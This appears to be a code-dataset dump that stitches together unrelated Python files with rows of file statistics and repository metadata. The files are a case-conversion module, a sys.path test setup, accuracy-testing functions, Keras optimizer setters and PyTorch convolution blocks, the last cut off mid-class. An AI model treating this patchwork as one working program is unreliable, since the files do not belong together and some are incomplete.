214E\u2184\u2C30-\u2C5E\u2C61\u2C65\u2C66\u2C68\u2C6A\u2C6C\u2C71\u2C73\u2C74\u2C76-\u2C7B\u2C81\u2C83\u2C85\u2C87\u2C89\u2C8B\u2C8D\u2C8F\u2C91\u2C93\u2C95\u2C97\u2C99\u2C9B\u2C9D\u2C9F\u2CA1\u2CA3\u2CA5\u2CA7\u2CA9\u2CAB\u2CAD\u2CAF\u2CB1\u2CB3\u2CB5\u2CB7\u2CB9\u2CBB\u2CBD\u2CBF\u2CC1\u2CC3\u2CC5\u2CC7\u2CC9\u2CCB\u2CCD\u2CCF\u2CD1\u2CD3\u2CD5\u2CD7\u2CD9\u2CDB\u2CDD\u2CDF\u2CE1\u2CE3\u2CE4\u2CEC\u2CEE\u2CF3\u2D00-\u2D25\u2D27\u2D2D\uA641\uA643\uA645\uA647\uA649\uA64B\uA64D\uA64F\uA651\uA653\uA655\uA657\uA659\uA65B\uA65D\uA65F\uA661\uA663\uA665\uA667\uA669\uA66B\uA66D\uA681\uA683\uA685\uA687\uA689\uA68B\uA68D\uA68F\uA691\uA693\uA695\uA697\uA699\uA69B\uA723\uA725\uA727\uA729\uA72B\uA72D\uA72F-\uA731\uA733\uA735\uA737\uA739\uA73B\uA73D\uA73F\uA741\uA743\uA745\uA747\uA749\uA74B\uA74D\uA74F\uA751\uA753\uA755\uA757\uA759\uA75B\uA75D\uA75F\uA761\uA763\uA765\uA767\uA769\uA76B\uA76D\uA76F\uA771-\uA778\uA77A\uA77C\uA77F\uA781\uA783\uA785\uA787\uA78C\uA78E\uA791\uA793-\uA795\uA797\uA799\uA79B\uA79D\uA79F\uA7A1\uA7A3\uA7A5\uA7A7\uA7A9\uA7B5\uA7B7\uA7FA\uAB30-\uAB5A\uAB60-\uAB65\uAB70-\uABBF\uFB00-\uFB06\uFB13-\uFB17\uFF41-\uFF5A])')
# @formatter:on
def lower_case(text, locale=None):
    # type: (str, str) -> str
    """
    Return *text* converted to lower case.

    Args:
        text: String to convert; ``None`` is treated as the empty string.
        locale: (Optional) Locale key ('tr', 'az', 'lt') selecting
            special unicode case-mapping rules applied before lowering.

    Returns:
        text: Lower case text.
    """
    rules = LANGUAGES.get(locale)
    result = '' if text is None else str(text)
    if rules:
        mapping = rules['map']
        result = rules['regexp'].sub(lambda m: mapping[m.group()], result)
    return result.lower()
def upper_case(text, locale=None):
    # type: (str, str) -> str
    """
    Return *text* converted to upper case.

    Args:
        text: String to convert; ``None`` is treated as the empty string.
        locale: (Optional) Locale key ('tr', 'az', 'lt') selecting
            special unicode case-mapping rules applied before uppering.

    Returns:
        text: Upper case text.
    """
    rules = LANGUAGES.get(locale)
    result = '' if text is None else str(text)
    if rules:
        mapping = rules['map']
        result = rules['regexp'].sub(lambda m: mapping[m.group()], result)
    return result.upper()
def no_case(text, locale=None, replacement=' '):
    # type: (str, str, str) -> str
    """
    Strip casing from *text*: break camelCase boundaries apart, replace
    runs of non-word characters with *replacement*, and lower the result.

    Args:
        text: String to convert; ``None`` yields ''.
        locale: (Optional) Locale used for the final lower-casing step.
        replacement: (Optional) Separator substituted for interior
            non-word runs (leading/trailing runs are dropped).

    Returns:
        text: Text with case removed.
    """
    if text is None:
        return ''

    def _sub_non_word(match):
        token = match.group()
        subject = match.string
        start = match.start()
        # A run at the very start or very end is stripped, not replaced.
        if start == 0 or start == len(subject) - len(token):
            return ''
        return replacement

    normalized = str(text)
    normalized = CAMEL_CASE_REGEXP.sub(r'\g<1> \g<2>', normalized)
    normalized = CAMEL_CASE_UPPER_REGEXP.sub(r'\g<1> \g<2>', normalized)
    normalized = NON_WORD_REGEXP.sub(_sub_non_word, normalized)
    return lower_case(normalized, locale=locale)
def snake_case(text, locale=None):
    # type: (str, str) -> str
    """
    Convert ``text`` to snake case (words joined by underscores).

    Args:
        text: String to convert.
        locale: (Optional) Locale used to convert unicode character to snake case.

    Returns:
        text: Snake case text.
    """
    # Snake case is simply the de-cased form with '_' as the separator.
    return no_case(text, locale=locale, replacement='_')
def constant_case(text, locale=None):
    # type: (str, str) -> str
    """
    Convert ``text`` to constant case (UPPER_SNAKE_CASE).

    Args:
        text: String to convert.
        locale: (Optional) Locale used to convert unicode character to constant case.

    Returns:
        text: Constant case text.
    """
    # Constant case is upper-cased snake case.
    snake = snake_case(text, locale=locale)
    return upper_case(snake, locale=locale)
def kebab_case(text, locale=None):
    # type: (str, str) -> str
    """
    Convert ``text`` to kebab case (words joined by hyphens).

    Args:
        text: String to convert.
        locale: (Optional) Locale used to convert unicode character to kebab case.

    Returns:
        text: Kebab case text.
    """
    # Kebab case is the de-cased form with '-' as the separator.
    return no_case(text, locale=locale, replacement='-')
def camel_case(text, locale=None, merge_numbers=False):
    # type: (str, str, bool) -> str
    """
    Convert ``text`` to camel case.

    Args:
        text: String to convert.
        locale: (Optional) Locale used to convert unicode character to camel case.
        merge_numbers: (Optional) Replace periods between numeric entities with an underscore.

    Returns:
        text: Camel case text.
    """
    decased = no_case(text, locale=locale)
    if not merge_numbers:
        # Keep adjacent numeric groups separated by '_' instead of merging them.
        decased = re.sub(r' (?=\d)', '_', decased)
    # Upper-case the character following each remaining space.
    return re.sub(r' (.)', lambda m: upper_case(m.group(1), locale=locale), decased)
if __name__ == '__main__':
    def tst_unicode_locale_replace():
        # Locale-specific characters whose case mapping differs from plain str.lower().
        samples = {
            'tr': {
                '\u0130': '\u0069',
                '\u0049': '\u0131',
                '\u0049\u0307': '\u0069',
            },
            'az': {
                '\u0130': '\u0069',
                '\u0049': '\u0131',
                '\u0049\u0307': '\u0069',
            },
            'lt': {
                '\u0049': '\u0069\u0307',
                '\u004A': '\u006A\u0307',
                '\u012E': '\u012F\u0307',
                '\u00CC': '\u0069\u0307\u0300',
                '\u00CD': '\u0069\u0307\u0301',
                '\u0128': '\u0069\u0307\u0303',
            },
        }
        for code, chars in samples.items():
            print(f'{code}:')
            for ch in chars:
                str_test = f'DUMMY TEXT [{ch}]'
                new_str = lower_case(str_test, code)
                print(f' {str_test}')
                print(f' {str_test.lower()}')
                print(f' {new_str}')
            print('')

    tst_str = 'DUMMY 55 44 TEXT'
    print(constant_case('camelCase'))
    print(camel_case(tst_str))
    print(kebab_case(tst_str))
| 124.715415
| 11,897
| 0.761195
| 4,878
| 31,553
| 4.908774
| 0.429479
| 0.006014
| 0.007016
| 0.005262
| 0.807684
| 0.802589
| 0.797703
| 0.797703
| 0.789601
| 0.789601
| 0
| 0.391854
| 0.059297
| 31,553
| 252
| 11,898
| 125.210317
| 0.414864
| 0.05242
| 0
| 0.356522
| 0
| 0.026087
| 0.891858
| 0.868172
| 0
| 1
| 0
| 0
| 0
| 1
| 0.078261
| false
| 0
| 0.008696
| 0
| 0.173913
| 0.069565
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
31086ed93e208b6575ce861111cb9696b9192bbc
| 508
|
py
|
Python
|
test/__init__.py
|
xynazog/amp4e_splunk_events_input
|
a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b
|
[
"BSD-2-Clause"
] | 9
|
2017-07-31T16:13:51.000Z
|
2021-01-06T15:02:36.000Z
|
test/__init__.py
|
xynazog/amp4e_splunk_events_input
|
a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b
|
[
"BSD-2-Clause"
] | 51
|
2017-10-24T17:25:44.000Z
|
2022-03-31T16:47:58.000Z
|
test/__init__.py
|
xynazog/amp4e_splunk_events_input
|
a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b
|
[
"BSD-2-Clause"
] | 12
|
2017-08-01T08:59:39.000Z
|
2021-02-24T21:10:46.000Z
|
import sys
import os
from pathlib import Path

# Make the bundled site-packages and the app's source directories importable
# ahead of anything already on the default path.
_ROOT = Path(__file__).parent.parent
sys.path.insert(0, "/usr/lib/python3.7/site-packages")
sys.path.insert(0, "/usr/local/lib/python3.7/site-packages")
sys.path.insert(0, os.path.join(_ROOT, 'bin'))
sys.path.insert(0, os.path.join(_ROOT, 'bin', 'util'))
sys.path.insert(0, os.path.join(_ROOT, 'bin', 'amp4e_events_input'))
# BUG FIX: the original used os.path.join(Path(__file__), '/test'); joining with
# an absolute component makes os.path.join discard the prefix, so the literal
# path '/test' was inserted — and the line was duplicated. Insert the package's
# own test directory once instead (presumably the dir containing this
# __init__.py — confirm against callers).
sys.path.insert(0, os.path.join(Path(__file__).parent, 'test'))
| 50.8
| 91
| 0.732283
| 88
| 508
| 3.977273
| 0.272727
| 0.14
| 0.26
| 0.28
| 0.837143
| 0.78
| 0.78
| 0.78
| 0.78
| 0.608571
| 0
| 0.024793
| 0.047244
| 508
| 10
| 92
| 50.8
| 0.698347
| 0
| 0
| 0.222222
| 0
| 0
| 0.218075
| 0.137525
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.222222
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3132202554927f1da41a247564709282c3b1cb74
| 1,629
|
py
|
Python
|
tester.py
|
ErikRichardS/mnist-ann
|
3fb34a25ec41177d34445d2ccda6cf42b7d4175e
|
[
"MIT"
] | null | null | null |
tester.py
|
ErikRichardS/mnist-ann
|
3fb34a25ec41177d34445d2ccda6cf42b7d4175e
|
[
"MIT"
] | null | null | null |
tester.py
|
ErikRichardS/mnist-ann
|
3fb34a25ec41177d34445d2ccda6cf42b7d4175e
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn.functional as F
from time import time
import numpy as np
# Takes a model and a loader and tests the accuracy
# of the model on the dataset wrapped in the loader
def test_model(net, loader):
    """Return the fraction of samples in `loader` that `net` classifies correctly."""
    n_seen = 0.0
    n_right = 0.0
    for batch, targets in loader:
        # Move the inputs onto the GPU.
        batch = batch.cuda()
        # Class probabilities from the model (detached — no gradients needed).
        probs = F.softmax(net(batch).detach(), dim=1)
        # Predicted class = arg max over the class dimension.
        guesses = torch.argmax(probs, dim=1).cpu().float()
        # Tally correct predictions and the number of samples processed.
        n_right += torch.sum(guesses == targets).item()
        n_seen += targets.shape[0]
    return n_right / n_seen
# Takes an ensemble and a loader and tests the accuracy
# of the ensemble on the dataset wrapped in the loader
def test_ensemble(ensemble, loader):
    """Return the fraction of samples in `loader` that `ensemble` classifies correctly."""
    n_seen = 0.0
    n_right = 0.0
    for batch, targets in loader:
        # Move the inputs onto the GPU.
        batch = batch.cuda()
        # Class probabilities from the ensemble's combined forward pass.
        probs = F.softmax(ensemble.forward(batch), dim=1)
        # Predicted class = arg max over the class dimension.
        guesses = torch.argmax(probs, dim=1).cpu().float()
        # Tally correct predictions and the number of samples processed.
        n_right += torch.sum(guesses == targets).item()
        n_seen += targets.shape[0]
    return n_right / n_seen
| 21.155844
| 56
| 0.689994
| 244
| 1,629
| 4.598361
| 0.29918
| 0.028521
| 0.017825
| 0.023173
| 0.818182
| 0.770053
| 0.73262
| 0.73262
| 0.73262
| 0.606061
| 0
| 0.011111
| 0.226519
| 1,629
| 76
| 57
| 21.434211
| 0.879365
| 0.446286
| 0
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
313d64468150688246dfafae0a26906dd4911c2b
| 14,334
|
py
|
Python
|
monk/tf_keras_1/optimizers/optimizers.py
|
Sanskar329/monk_v1
|
51a497a925ec1fb2c8fef1d51245ea7040a5a65a
|
[
"Apache-2.0"
] | 7
|
2020-07-26T08:37:29.000Z
|
2020-10-30T10:23:11.000Z
|
monk/tf_keras_1/optimizers/optimizers.py
|
mursalfk/monk_v1
|
62f34a52f242772186ffff7e56764e958fbcd920
|
[
"Apache-2.0"
] | null | null | null |
monk/tf_keras_1/optimizers/optimizers.py
|
mursalfk/monk_v1
|
62f34a52f242772186ffff7e56764e958fbcd920
|
[
"Apache-2.0"
] | null | null | null |
from tf_keras_1.optimizers.imports import *
from system.imports import *
@accepts(dict, [int, float], momentum=[int, float], momentum_dampening_rate=[int, float], weight_decay=[int, float],
        clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def sgd(system_dict, learning_rate, momentum=0, weight_decay=0, momentum_dampening_rate=0, clipnorm=0.0, clipvalue=0.0):
    '''
    Register plain stochastic gradient descent as the active optimizer.

    Args:
        system_dict (dict): System dictionary storing experiment state and set variables
        learning_rate (float): Initial base learning rate
        momentum (float): Momentum value for driving the weights towards minima
        weight_decay (float): Value for regularizing weights post every update
        momentum_dampening_rate (float): Reduction rate for momentum
        clipnorm (float): Gradient clipping factor
        clipvalue (float): Value for clipping

    Returns:
        dict: updated system dict
    '''
    hyper = system_dict["hyper-parameters"]
    system_dict["local"]["optimizer"] = "sgd"
    hyper["learning_rate"] = learning_rate
    hyper["optimizer"]["name"] = "sgd"
    hyper["optimizer"]["params"].update({
        "lr": learning_rate,
        "momentum": momentum,
        "weight_decay": weight_decay,
        "momentum_dampening_rate": momentum_dampening_rate,
        "clipnorm": clipnorm,
        "clipvalue": clipvalue,
    })
    return system_dict
@accepts(dict, [int, float], momentum=[int, float], momentum_dampening_rate=[int, float], weight_decay=[int, float],
        clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def nesterov_sgd(system_dict, learning_rate, momentum=0, weight_decay=0, momentum_dampening_rate=0, clipnorm=0.0, clipvalue=0.0):
    '''
    Register stochastic gradient descent with nesterov acceleration as the active optimizer.

    Args:
        system_dict (dict): System dictionary storing experiment state and set variables
        learning_rate (float): Initial base learning rate
        momentum (float): Momentum value for driving the weights towards minima
        weight_decay (float): Value for regularizing weights post every update
        momentum_dampening_rate (float): Reduction rate for momentum
        clipnorm (float): Gradient clipping factor
        clipvalue (float): Value for clipping

    Returns:
        dict: updated system dict
    '''
    hyper = system_dict["hyper-parameters"]
    system_dict["local"]["optimizer"] = "nesterov_sgd"
    hyper["learning_rate"] = learning_rate
    hyper["optimizer"]["name"] = "nesterov_sgd"
    hyper["optimizer"]["params"].update({
        "lr": learning_rate,
        "momentum": momentum,
        "weight_decay": weight_decay,
        "momentum_dampening_rate": momentum_dampening_rate,
        "clipnorm": clipnorm,
        "clipvalue": clipvalue,
    })
    return system_dict
@accepts(dict, [int, float], decay_rate=[int, float], epsilon=[int, float], weight_decay=[int, float],
        clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def rmsprop(system_dict, learning_rate, decay_rate=0.99, epsilon=1e-08, weight_decay=0,
            clipnorm=0.0, clipvalue=0.0):
    '''
    Register root mean square prop as the active optimizer.

    Args:
        system_dict (dict): System dictionary storing experiment state and set variables
        learning_rate (float): Initial base learning rate
        decay_rate (float): A decay factor of moving average over past squared gradient.
        epsilon (float): A value to avoid division by zero
        weight_decay (float): Value for regularizing weights post every update
        clipnorm (float): Gradient clipping factor
        clipvalue (float): Value for clipping

    Returns:
        dict: updated system dict
    '''
    hyper = system_dict["hyper-parameters"]
    system_dict["local"]["optimizer"] = "rmsprop"
    hyper["learning_rate"] = learning_rate
    hyper["optimizer"]["name"] = "rmsprop"
    hyper["optimizer"]["params"].update({
        "lr": learning_rate,
        "epsilon": epsilon,
        "decay_rate": decay_rate,
        "weight_decay": weight_decay,
        "clipnorm": clipnorm,
        "clipvalue": clipvalue,
    })
    return system_dict
@accepts(dict, [int, float], beta1=[int, float], beta2=[int, float], epsilon=[int, float], weight_decay=[int, float], amsgrad=bool,
        clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def adam(system_dict, learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08, weight_decay=0, amsgrad=False, clipnorm=0.0, clipvalue=0.0):
    '''
    Register ADAM as the active optimizer.

    Args:
        system_dict (dict): System dictionary storing experiment state and set variables
        learning_rate (float): Initial base learning rate
        beta1 (float): Exponential decay rate for first momentum estimates
        beta2 (float): Exponential decay rate for first second estimates
        weight_decay (float): Value for regularizing weights post every update
        amsgrad (bool): If True, AMSGrad variant of this algorithm is used
        epsilon (float): A value to avoid division by zero
        clipnorm (float): Gradient clipping factor
        clipvalue (float): Value for clipping

    Returns:
        dict: updated system dict
    '''
    hyper = system_dict["hyper-parameters"]
    system_dict["local"]["optimizer"] = "adam"
    hyper["learning_rate"] = learning_rate
    hyper["optimizer"]["name"] = "adam"
    hyper["optimizer"]["params"].update({
        "lr": learning_rate,
        "beta1": beta1,
        "beta2": beta2,
        "epsilon": epsilon,
        "weight_decay": weight_decay,
        "amsgrad": amsgrad,
        "clipnorm": clipnorm,
        "clipvalue": clipvalue,
    })
    return system_dict
@accepts(dict, [int, float], beta1=[int, float], beta2=[int, float], epsilon=[int, float], weight_decay=[int, float], amsgrad=bool,
        momentum_decay=[int, float], clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def nesterov_adam(system_dict, learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08, weight_decay=0, amsgrad=False,
                  momentum_decay=0.004, clipnorm=0.0, clipvalue=0.0):
    '''
    Register ADAM with nesterov momentum acceleration (nadam) as the active optimizer.

    Args:
        system_dict (dict): System dictionary storing experiment state and set variables
        learning_rate (float): Initial base learning rate
        beta1 (float): Exponential decay rate for first momentum estimates
        beta2 (float): Exponential decay rate for first second estimates
        weight_decay (float): Value for regularizing weights post every update
        amsgrad (bool): If True, AMSGrad variant of this algorithm is used
        epsilon (float): A value to avoid division by zero
        momentum_decay (float): Decay rate applied to the momentum term
        clipnorm (float): Gradient clipping factor
        clipvalue (float): Value for clipping

    Returns:
        dict: updated system dict
    '''
    hyper = system_dict["hyper-parameters"]
    system_dict["local"]["optimizer"] = "nadam"
    hyper["learning_rate"] = learning_rate
    hyper["optimizer"]["name"] = "nadam"
    hyper["optimizer"]["params"].update({
        "lr": learning_rate,
        "beta1": beta1,
        "beta2": beta2,
        "epsilon": epsilon,
        "weight_decay": weight_decay,
        "amsgrad": amsgrad,
        "momentum_decay": momentum_decay,
        "clipnorm": clipnorm,
        "clipvalue": clipvalue,
    })
    return system_dict
@accepts(dict, [int, float], beta1=[int, float], beta2=[int, float], epsilon=[int, float], weight_decay=[int, float],
        clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def adamax(system_dict, learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08, weight_decay=0, clipnorm=0.0, clipvalue=0.0):
    '''
    Register Adamax as the active optimizer.

    Args:
        system_dict (dict): System dictionary storing experiment state and set variables
        learning_rate (float): Initial base learning rate
        beta1 (float): Exponential decay rate for first momentum estimates
        beta2 (float): Exponential decay rate for first second estimates
        weight_decay (float): Value for regularizing weights post every update
        epsilon (float): A value to avoid division by zero
        clipnorm (float): Gradient clipping factor
        clipvalue (float): Value for clipping

    Returns:
        dict: updated system dict
    '''
    hyper = system_dict["hyper-parameters"]
    system_dict["local"]["optimizer"] = "adamax"
    hyper["learning_rate"] = learning_rate
    hyper["optimizer"]["name"] = "adamax"
    hyper["optimizer"]["params"].update({
        "lr": learning_rate,
        "beta1": beta1,
        "beta2": beta2,
        "epsilon": epsilon,
        "weight_decay": weight_decay,
        "clipnorm": clipnorm,
        "clipvalue": clipvalue,
    })
    return system_dict
@accepts(dict, [int, float], rho=[int, float], epsilon=[int, float], weight_decay=[int, float],
        clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def adadelta(system_dict, learning_rate, rho=0.9, epsilon=1e-06, weight_decay=0, clipnorm=0.0, clipvalue=0.0):
    '''
    Register Adadelta as the active optimizer.

    Args:
        system_dict (dict): System dictionary storing experiment state and set variables
        learning_rate (float): Initial base learning rate
        rho (float): Exponential decay rate for momentum estimates
        weight_decay (float): Value for regularizing weights post every update
        epsilon (float): A value to avoid division by zero
        clipnorm (float): Gradient clipping factor
        clipvalue (float): Value for clipping

    Returns:
        dict: updated system dict
    '''
    hyper = system_dict["hyper-parameters"]
    system_dict["local"]["optimizer"] = "adadelta"
    hyper["learning_rate"] = learning_rate
    hyper["optimizer"]["name"] = "adadelta"
    hyper["optimizer"]["params"].update({
        "lr": learning_rate,
        "rho": rho,
        "epsilon": epsilon,
        "weight_decay": weight_decay,
        "clipnorm": clipnorm,
        "clipvalue": clipvalue,
    })
    return system_dict
@accepts(dict, [int, float], learning_rate_decay=[int, float], weight_decay=[int, float], epsilon=[int, float],
        clipnorm=[int, float], clipvalue=[int, float], post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def adagrad(system_dict, learning_rate, learning_rate_decay=0, weight_decay=0, epsilon=0, clipnorm=0.0, clipvalue=0.0):
    '''
    Register Adagrad as the active optimizer.

    Args:
        system_dict (dict): System dictionary storing experiment state and set variables
        learning_rate (float): Initial base learning rate
        learning_rate_decay (float): Learning rate decay factor
        weight_decay (float): Value for regularizing weights post every update
        epsilon (float): A value to avoid division by zero
        clipnorm (float): Gradient clipping factor
        clipvalue (float): Value for clipping

    Returns:
        dict: updated system dict
    '''
    hyper = system_dict["hyper-parameters"]
    system_dict["local"]["optimizer"] = "adagrad"
    hyper["learning_rate"] = learning_rate
    hyper["optimizer"]["name"] = "adagrad"
    hyper["optimizer"]["params"].update({
        "lr": learning_rate,
        "lr_decay": learning_rate_decay,
        "epsilon": epsilon,
        "weight_decay": weight_decay,
        "clipnorm": clipnorm,
        "clipvalue": clipvalue,
    })
    return system_dict
| 52.698529
| 136
| 0.699735
| 1,705
| 14,334
| 5.73607
| 0.066862
| 0.112474
| 0.107362
| 0.178937
| 0.952454
| 0.936605
| 0.932209
| 0.930266
| 0.927403
| 0.916155
| 0
| 0.009792
| 0.152156
| 14,334
| 271
| 137
| 52.892989
| 0.794948
| 0.34017
| 0
| 0.675439
| 0
| 0
| 0.310099
| 0.005122
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070175
| false
| 0
| 0.017544
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31756e419759074b9df4ad77f657fa5c3aad1e56
| 9,739
|
py
|
Python
|
modelR/layers/msr_blocks.py
|
Shank2358/LO-Det
|
869f3f537af9bc656f2bfdfa97ebb95bf70847a7
|
[
"Apache-2.0"
] | 21
|
2021-04-29T03:23:34.000Z
|
2022-03-13T23:45:39.000Z
|
modelR/layers/msr_blocks.py
|
Shank2358/LO-Det
|
869f3f537af9bc656f2bfdfa97ebb95bf70847a7
|
[
"Apache-2.0"
] | 2
|
2021-07-22T15:15:11.000Z
|
2022-02-17T08:17:05.000Z
|
modelR/layers/msr_blocks.py
|
Shank2358/LO-Det
|
869f3f537af9bc656f2bfdfa97ebb95bf70847a7
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
from dropblock import DropBlock2D, LinearScheduler
from ..layers.convolutions import *
class MSR_Convset_L(nn.Module):
    """Large multi-scale conv set: expand/squeeze stem, then three residually
    chained dilated 3x3 branches (dilation 2/4/6) concatenated with the stem
    output and fused by a 1x1 convolution."""

    def __init__(self, filters_in):
        super(MSR_Convset_L, self).__init__()
        # Expand to 2x channels, then squeeze back to filters_in.
        self.__dw0 = Convolutional(filters_in=filters_in, filters_out=filters_in * 2,
                                   kernel_size=3, stride=1, pad=1, norm="bn", activate="leaky")
        self.__pw0 = Convolutional(filters_in=filters_in * 2, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="leaky")
        # Dilated branches with increasing dilation (2, 4, 6).
        self.__dw1 = Convolutional(filters_in=filters_in, filters_out=filters_in,
                                   kernel_size=3, stride=1, pad=2, dila=2, norm="bn", activate="leaky")
        self.__dw2 = Convolutional(filters_in=filters_in, filters_out=filters_in,
                                   kernel_size=3, stride=1, pad=4, dila=4, norm="bn", activate="leaky")
        self.__dw3 = Convolutional(filters_in=filters_in, filters_out=filters_in,
                                   kernel_size=3, stride=1, pad=6, dila=6, norm="bn", activate="leaky")
        # Fuse the 4-way concatenation back down to filters_in channels.
        self.__pw1 = Convolutional(filters_in=filters_in * 4, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="Mish")
        # DropBlock regularization, linearly ramped from 0 to 0.1 over 5 steps.
        self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1),
                                      start_value=0., stop_value=0.1, nr_steps=5)

    def forward(self, x):
        stem = self.__drop(self.__dw0(x))
        base = self.__pw0(stem)
        branch1 = self.__dw1(base)
        branch2 = self.__dw2(base) + branch1
        branch3 = self.__dw3(base) + branch2
        return self.__pw1(torch.cat((base, branch1, branch2, branch3), 1))
class MSR_Convset_M(nn.Module):
    """Medium multi-scale conv set: expand/squeeze stem, two residually chained
    dilated 3x3 branches (dilation 1/2) concatenated and fused by a 1x1 conv."""

    def __init__(self, filters_in):
        super(MSR_Convset_M, self).__init__()
        # Expand to 2x channels, then squeeze back to filters_in.
        self.__dw0 = Convolutional(filters_in=filters_in, filters_out=filters_in * 2,
                                   kernel_size=3, stride=1, pad=1, norm="bn", activate="leaky")
        self.__pw0 = Convolutional(filters_in=filters_in * 2, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="leaky")
        # Dilated branches (dilation 1 and 2).
        self.__dw1 = Convolutional(filters_in=filters_in, filters_out=filters_in,
                                   kernel_size=3, stride=1, pad=1, dila=1, norm="bn", activate="leaky")
        self.__dw2 = Convolutional(filters_in=filters_in, filters_out=filters_in,
                                   kernel_size=3, stride=1, pad=2, dila=2, norm="bn", activate="leaky")
        # Fuse the 2-way concatenation back down to filters_in channels.
        self.__pw1 = Convolutional(filters_in=filters_in * 2, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="Mish")
        # DropBlock regularization, linearly ramped from 0 to 0.1 over 5 steps.
        self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1),
                                      start_value=0., stop_value=0.1, nr_steps=5)

    def forward(self, x):
        stem = self.__drop(self.__dw0(x))
        base = self.__pw0(stem)
        branch1 = self.__dw1(base)
        branch2 = self.__dw2(base) + branch1
        return self.__pw1(torch.cat((branch1, branch2), 1))
class MSR_Convset_S(nn.Module):
    """Small conv set: two expand/squeeze (3x3 then 1x1) stages with DropBlock
    applied after the first 3x3 convolution."""

    def __init__(self, filters_in):
        super(MSR_Convset_S, self).__init__()
        # First expand/squeeze stage.
        self.__dw0 = Convolutional(filters_in=filters_in, filters_out=filters_in * 2,
                                   kernel_size=3, stride=1, pad=1, norm="bn", activate="leaky")
        self.__pw0 = Convolutional(filters_in=filters_in * 2, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="leaky")
        # Second expand/squeeze stage.
        self.__dw1 = Convolutional(filters_in=filters_in, filters_out=filters_in * 2,
                                   kernel_size=3, stride=1, pad=1, dila=1, norm="bn", activate="leaky")
        self.__pw1 = Convolutional(filters_in=filters_in * 2, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="leaky")
        # DropBlock regularization, linearly ramped from 0 to 0.1 over 5 steps.
        self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1),
                                      start_value=0., stop_value=0.1, nr_steps=5)

    def forward(self, x):
        y = self.__drop(self.__dw0(x))
        y = self.__pw0(y)
        y = self.__dw1(y)
        return self.__pw1(y)
class MSR_Convset_L_R(nn.Module):
    """Large multi-scale conv set, rotated variant: same topology as
    MSR_Convset_L but the 3x3 stages use Directional_Dynamic_Convolutional
    (groups=2, type='tri')."""

    def __init__(self, filters_in):
        super(MSR_Convset_L_R, self).__init__()
        # Expand to 2x channels with a directional dynamic conv, then squeeze.
        self.__dw0 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in * 2,
                                                       kernel_size=3, stride=1, pad=1, dila=1, groups=2,
                                                       bias=False, type='tri', norm="bn", activate='leaky')
        self.__pw0 = Convolutional(filters_in=filters_in * 2, filters_out=filters_in,
                                   kernel_size=1, stride=1, pad=0, norm="bn", activate="leaky")
        # Directional dilated branches with increasing dilation (2, 4, 6).
        self.__dw1 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in,
                                                       kernel_size=3, stride=1, pad=2, dila=2, groups=2,
                                                       bias=False, type='tri', norm="bn", activate='leaky')
        self.__dw2 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in,
                                                       kernel_size=3, stride=1, pad=4, dila=4, groups=2,
                                                       bias=False, type='tri', norm="bn", activate='leaky')
